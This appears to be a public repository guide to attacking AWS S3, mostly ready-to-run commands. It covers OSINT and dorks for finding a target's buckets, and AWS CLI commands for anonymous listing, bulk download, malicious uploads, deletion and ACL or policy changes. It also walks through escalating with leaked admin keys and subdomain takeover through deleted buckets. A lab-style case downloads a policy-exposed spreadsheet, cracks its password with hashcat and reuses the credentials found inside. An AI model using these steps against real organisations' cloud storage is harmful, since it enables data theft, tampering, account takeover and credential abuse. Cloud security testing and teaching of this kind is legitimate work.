
Cloud AWS hacking (Public Repository)

You can use this S3 hacking guide for your own work. I tested everything and organized it the way it makes sense to me from a workflow point of view.

OSINT & Active Methods to Identify the AWS S3 Buckets of a Target IP / COMPANY / DOMAIN

Method: Detail (if available)
Wappalyzer: Identify technologies on the target website.
HTML inspection: Check HTML, CSS & JS files and comments, e.g., <img src="https://s3.amazonaws.com/my-bucket/my-image.jpg" alt="My Image">. You can also use LinkFinder to find endpoints/hyperlinks, or use Link Gopher.
Network requests: When a webpage loads, it may make network requests to an S3 bucket to fetch resources such as images, videos, or other files. Use your browser's developer tools to monitor network requests and look for requests to S3 bucket URLs.
Cookies: Some websites may use cookies to store S3 bucket URLs or other sensitive information. Inspect the cookies of a website using your browser's developer tools or a browser extension such as EditThisCookie.
Configuration files: If the website is built using a framework or content management system (CMS), it may store S3 bucket URLs or other configuration settings in configuration files such as config.php or settings.ini.
Enumeration via tools on GitHub: Lazy S3, bucket_finder, AWS Cred Scanner, sandcastle, Mass3, Dumpster Diver, S3 Bucket Finder, S3Scanner.
Other tools to enumerate S3: https://github.com/sa7mon/S3Scanner , https://github.com/clario-tech/s3-inspector , https://github.com/jordanpotti/AWSBucketDump (contains a list with potential bucket names) , https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets , https://github.com/smaranchand/bucky , https://github.com/tomdev/teh_s3_bucketeers , https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3 , https://github.com/Eilonh/s3crets_scanner , https://github.com/belane/CloudHunter
Content-Security-Policy response headers: *
Burp Suite spider: go through the results.
dig -x on the target domain or IP: the answer may come back as something like s3-website-us-east-1.amazonaws.com.
https://osint.sh/buckets/ : a little better than GrayhatWarfare because it is not limited to filtering by file type (no registration required).
https://buckets.grayhatwarfare.com/ : *
Google dorks: site:http://s3.amazonaws.com intitle:index.of.bucket, site:http://amazonaws.com inurl:".s3.amazonaws.com/", site:.s3.amazonaws.com "Company" intitle:index.of.bucket, site:http://s3.amazonaws.com intitle:Bucket loading, site:*.amazonaws.com inurl:index.html, Bucket Date Modified
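A quick way to confirm that a hostname is actually fronted by S3 (a minimal sketch; assets.example.com is a placeholder hostname, not from any real target):

dig +short CNAME assets.example.com   # may come back as something like mybucket.s3.amazonaws.com or an s3-website-* endpoint
curl -sI http://assets.example.com/ | grep -iE 'server|x-amz'   # S3 responses typically include Server: AmazonS3 and x-amz-* headers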

Visual examples of all the methods above to identify S3 buckets (how it looks in practice)

Wappalyzer image

View source code (S3 bucket URL hardcoded in the HTML of the webpage; this also applies to IP-based hosts, not only the www.domain.com format)

image

Inspect network traffic and watch the server GET requests (you can filter by keyword using the usual S3 URL formats)

image

s3 in robots.txt (or generally ext:txt)

image

.json files

image

Google dorking

image

Using LeakIX premium plugins and querying leaks to find buckets and access keys

image

Shodan, Censys, FOFA, or ZoomEye with a similar query (change the region as needed)

image

What actions can we perform on S3?

Enumeration: use AWS CLI commands like aws s3 ls or aws s3api list-objects to enumerate the contents of the bucket and gather information about the exposed files and directories.

Access and Download: If the S3 bucket has public read access, we can use AWS CLI commands such as aws s3 cp or aws s3 sync to download the files from the bucket to our local system.

Upload or Modify Objects: If the bucket has public write access or allows unauthorized uploads, we may use commands like aws s3 cp or aws s3 sync to upload malicious files, overwrite existing files, or modify the content within the bucket.

Bucket and Object Deletion: In cases where the bucket has misconfigured or weak access control, we might attempt to delete or remove objects from the bucket using commands like aws s3 rm.

ACL and Policy Modification: If the bucket's access control settings are misconfigured, we may use AWS CLI commands like aws s3api put-bucket-acl or aws s3api put-bucket-policy to modify the access control lists (ACLs) or bucket policies, granting ourselves or others unauthorized access.
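The matching AWS CLI commands for each of the actions above, as a quick reference (a sketch only; <bucket> is a placeholder, and whether each call succeeds depends entirely on the bucket's permissions):

aws s3 ls s3://<bucket> --no-sign-request                       # enumeration
aws s3 sync s3://<bucket> ./loot --no-sign-request              # access and download everything readable
aws s3 cp poc.txt s3://<bucket>/poc.txt --no-sign-request       # upload / modify test
aws s3 rm s3://<bucket>/poc.txt --no-sign-request               # deletion test
aws s3api put-bucket-acl --bucket <bucket> --acl public-read    # ACL modification (normally needs credentials configured)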

First, let's understand what S3 bucket URLs look like in real life. There are multiple scenarios.

Example URL one (here the URL format is bucket name first, i.e., targetbucket.s3.amazonaws.com); to read this bucket we would use s3://divvy-tripdata

image

Example URL two (here the URL format is path style, i.e., s3.amazonaws.com/targetbucket); to read this bucket we would use s3://capitalbikeshare-data

image

Example URL three (here the domain does not reveal the bucket name directly; the bucket sits behind a differently named host); to read this bucket we would use s3://dpa-prd

image

Example URL four (here the subdomain name and the bucket name match); to read this bucket we would use s3://flaws-cloud

image
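Whichever URL style you see, the bucket name is what goes into the s3:// URI. A sketch using the two public example buckets named above:

aws s3 ls s3://divvy-tripdata --no-sign-request            # bucket name taken from the bucket-first (virtual-hosted) URL
aws s3 ls s3://capitalbikeshare-data --no-sign-request     # bucket name taken from the path-style URL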

Interesting file types to look for in S3

filetype
PS1
XML
TXT
CSV
XLSX

visual example of files (filetypes) in bucket

image
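One way to surface these file types quickly in a large listing (a sketch; <bucket> is a placeholder):

aws s3 ls s3://<bucket> --recursive --no-sign-request | grep -iE '\.(ps1|xml|txt|csv|xlsx)$'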

Some real-life case scenarios of AWS S3 attacks I have gathered

From NoSuchKey to full listing of the bucket

Access from the web gives "NoSuchKey", but with --no-sign-request it works image image
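In command form, the contrast looks roughly like this (<bucket> is a placeholder):

curl https://<bucket>.s3.amazonaws.com/somekey     # returns the NoSuchKey / access error seen in the browser
aws s3 ls s3://<bucket> --no-sign-request          # anonymous listing still works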

find access keys in file in bucket, authenticate, escalate

Find a file with admin creds, log in, and access further folders/files that were otherwise restricted. Found admin keys:

image

aws configure (auth with admin keys)

image

ls the admin folder and its contents (which wasn't accessible with --no-sign-request)

image
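A sketch of that escalation (the profile name is arbitrary and the key values are whatever was found in the file; <bucket> is a placeholder):

aws configure --profile found-admin                                  # paste the leaked access key ID and secret key
aws s3 ls s3://<bucket>/admin/ --profile found-admin                 # now readable
aws s3 cp s3://<bucket>/admin/ ./admin-loot --recursive --profile found-admin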

404 NoSuchBucket to subdomain takeover

The developer deleted the S3 bucket but did not delete the CNAME pointing to that S3 bucket.

image
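Spotting the dangling record (a sketch; sub.example.com is a placeholder for the victim subdomain):

dig +short CNAME sub.example.com                         # still points at <bucket>.s3.amazonaws.com or an s3-website-* endpoint
curl -s http://sub.example.com/ | grep -i NoSuchBucket   # the error that signals a takeover is possible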

Use this reference: https://github.com/EdOverflow/can-i-take-over-xyz

Go to S3 panel
Click Create Bucket
Set Bucket name to source domain name (i.e., the domain you want to take over from error)
Click Next multiple times to finish
Open the created bucket
Click Upload
Select the file which will be used for PoC (HTML or TXT file). I recommend naming it differently than index.html; you can use poc (without extension)
In Permissions tab select Grant public read access to this object(s)
After upload, select the file and click More -> Change metadata
Click Add metadata, select Content-Type and value should reflect the type of document. If HTML, choose text/html, etc.
(Optional) If the bucket was configured as a website
Switch to Properties tab
Click Static website hosting
Select Use this bucket to host a website
As an index, choose the file that you uploaded
Click Save
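The same PoC can be staged from the AWS CLI instead of the console (a sketch; the bucket name must exactly match the dangling hostname from the error, shown here as sub.example.com):

aws s3 mb s3://sub.example.com
echo 'subdomain takeover PoC' > poc
aws s3 cp poc s3://sub.example.com/poc --acl public-read --content-type text/plain   # newer accounts may require loosening Block Public Access first
aws s3 website s3://sub.example.com/ --index-document poc   # optional: only if the original bucket was serving a static website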

Exploit EBS snapshots by AWS account ID

https://github.com/WeAreCloudar/s3-account-search/

Issue the command python3 -m pip install s3-account-search to install the tool s3-account-search. Next, we need to provide the Amazon Resource Name (ARN) of a role under our control (i.e. in our own AWS account), as well as a target S3 bucket in the AWS account whose ID we want to enumerate.

image
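Usage is roughly the following, per the tool's README (the role ARN is one in our own account that we can assume; the bucket name here is a placeholder):

s3-account-search arn:aws:iam::123456789012:role/s3-enum-role s3://target-bucket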

Writable bucket (upload a malicious PoC file)

image

From the account ID, get access keys

image

TO ADD: IAM abuse cases add from https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum + https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools

AWS CLI IAM Enumeration & Exploitation Commands

Command Detail (if available)
* *
* *
* *
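A few IAM enumeration commands that are commonly useful once valid keys are configured (a sketch; <user> is a placeholder):

aws sts get-caller-identity                              # which account / principal the keys belong to
aws iam list-users
aws iam list-roles
aws iam list-attached-user-policies --user-name <user>
aws iam list-user-policies --user-name <user>
aws iam get-account-authorization-details                # full policy dump, if permitted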

AWS CLI ID Exploitation Commands (Get Keys)

Command Detail (if available)
* *
* *
* *

Now let's see what the configurations look like from the inside of the AWS console (and what leads to abuse of them)

Notes
If internally the bucket permissions are enabled only for AWS users, then you cannot use --no-sign-request (it will not work; you must use credentials configured in the CLI).

image

image

Notes
With --no-sign-request it does not work because of the configuration.

image

Notes
This one is used to enumerate the contents of the bucket and gather information about the exposed files and directories.

image

Notes
If internally the bucket permissions are enabled for everyone (all public), then you can use --no-sign-request, and it also works with credentials.

image

Notes
The actions and commands that are successfully executed depend entirely on the configuration of permissions. For example, this setting is configured so that everyone is allowed to list but not to read the ACP; this is why, when attempting a read of the ACP (policy), we don't get access.

image
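That "list allowed but READ_ACP denied" situation looks like this from the CLI (a sketch; <bucket> is a placeholder):

aws s3 ls s3://<bucket> --no-sign-request                        # listing succeeds
aws s3api get-bucket-acl --bucket <bucket> --no-sign-request     # AccessDenied, because READ_ACP was not granted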

More inside view of poor configurations or possible configurations

image

image

image

image

image

image

commands to run tests with

List contents of a bucket: aws s3 ls s3://bucket --no-sign-request

Recursively list files: aws s3 ls s3://bucket --no-sign-request --recursive

Download files test: aws s3 cp s3://bucket/folder/file . --no-sign-request

Upload file test (permissions): aws s3 cp localfile s3://[name_of_bucket]/test_file.txt --no-sign-request

To list directories, close the path with /dir/ (a trailing slash).

It is good to test --recursive in case there is a folder that is forbidden for ls.

curl -I https://s3.amazonaws.com/bucket - this will show the region configured for this bucket (in the x-amz-bucket-region response header)

Identify overly permissive policies (e.g., Action set to "*")
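Pulling the policy to check for this (a sketch; <bucket> is a placeholder, and the JSON below is an illustrative over-broad statement, not taken from a real bucket):

aws s3api get-bucket-policy --bucket <bucket> --no-sign-request
# red flag inside the returned policy:
# {"Effect": "Allow", "Principal": "*", "Action": "s3:*", "Resource": "arn:aws:s3:::<bucket>/*"}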

If you go to the URL to view bucket content at the root, e.g. bucket.s3.amazonaws.com/, make sure there is no double // because that will show "NoSuchBucket".

Read access control list

At the bucket level, this permission allows reading the bucket's Access Control List; at the object level, it allows reading the object's Access Control List. Read ACL can be tested with the AWS command line using the following commands:

aws s3api get-bucket-acl --bucket [bucketname] --no-sign-request

aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request

Notes: some buckets will allow ls using --no-sign-request but will not allow downloading files from them (forbidden).

CASE SCENARIOS

CASE 1

Found an IP. From nmap, this IP has open port 3000 described as the Node.js Express framework. You access it via the web on this port and see a site come up; the site's source code reveals a bucket. You try to list the bucket using aws s3 ls s3://hugelogistics-data, but it doesn't work; you try with --no-sign-request and it still does not work. We might think to just download all the files from the bucket using aws s3 cp s3://hugelogistics-data . --recursive, but this also fails.

We then shift to looking at the ACL of the bucket, so we run aws s3api get-bucket-acl --bucket hugelogistics-data, but that fails too. Next we check whether, instead of the ACL, we can read the policy, so we run aws s3api get-bucket-policy --bucket hugelogistics-data - and this succeeds: image

This bucket policy can be summarized as follows: any authenticated AWS user globally can access the ACL and the content of the two specified files (backup.xlsx and background.png) in the hugelogistics-data bucket. They can also retrieve the policy of the hugelogistics-data bucket. Even though we weren't able to list the contents of the bucket, we're still able to leak the contents and access them!

Let's transfer the Excel file locally. We can run this command to download the file exposed by the policy and see if it has more data for us to pivot from: aws s3 cp s3://hugelogistics-data/backup.xlsx .

Attempting to open this in LibreOffice or Microsoft Office, we're prompted to enter a password. Let's see if we can crack it. First, download the Python script office2john.py: wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py - this script takes an Office file as input and creates a hash, taking the version of the Office document into account. Generate a hash of the document that we can subject to an offline brute-force attack with: python3 office2john.py backup.xlsx > hash.txt - remove the filename prefix backup.xlsx: from the hash and save it. Running the command below, we crack the password for the spreadsheet in under two minutes! hashcat -a 0 -m 9600 hash.txt rockyou.txt image

Opening the XLSX file we see a table of creds image

One entry here mentions a CRM. What makes sense is to go back to the site and brute-force directories on the IP:port for any other logins unique to CRM-based access, and use these creds there image image image
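The command chain from this case, condensed (run with any valid AWS credentials configured, since the policy grants access to any authenticated AWS user):

aws s3api get-bucket-policy --bucket hugelogistics-data
aws s3 cp s3://hugelogistics-data/backup.xlsx .
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py
python3 office2john.py backup.xlsx > hash.txt      # then strip the leading "backup.xlsx:" from the hash
hashcat -a 0 -m 9600 hash.txt rockyou.txt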
